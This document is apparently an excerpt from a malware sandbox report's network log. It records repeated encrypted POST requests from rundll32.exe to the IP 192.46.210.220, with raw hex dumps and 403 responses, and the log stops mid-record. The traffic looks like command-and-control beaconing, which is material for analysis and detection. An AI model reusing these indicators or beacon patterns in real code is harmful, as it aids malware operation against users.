                                                                                                              2021-10-28 02:49:34 UTC79OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:34 UTC79OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:35 UTC89INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:34 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              17192.168.2.449849192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:34 UTC84OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:34 UTC84OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:35 UTC89INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:35 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              18192.168.2.449855192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:38 UTC89OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:38 UTC89OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:38 UTC99INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:38 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              19192.168.2.449857192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:38 UTC94OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:38 UTC94OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:39 UTC99INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:39 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.449792192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:05 UTC9OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:05 UTC10OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:05 UTC14INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:05 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              20192.168.2.449863192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:41 UTC99OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:41 UTC99OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:42 UTC109INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:42 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              21192.168.2.449865192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:42 UTC104OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:42 UTC104OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:43 UTC109INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:43 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              22192.168.2.449872192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:46 UTC109OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:46 UTC109OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:47 UTC119INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:47 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              23192.168.2.449873192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:47 UTC114OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:47 UTC114OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:47 UTC119INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:47 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              24192.168.2.449882192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:50 UTC119OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:50 UTC119OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:51 UTC129INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:51 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              25192.168.2.449883192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:50 UTC124OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:50 UTC124OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:51 UTC129INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:51 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              26192.168.2.449891192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:54 UTC129OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:54 UTC129OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:55 UTC139INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:55 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              27192.168.2.449892192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:54 UTC134OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:54 UTC134OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:55 UTC139INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:55 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              28192.168.2.449900192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:58 UTC139OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
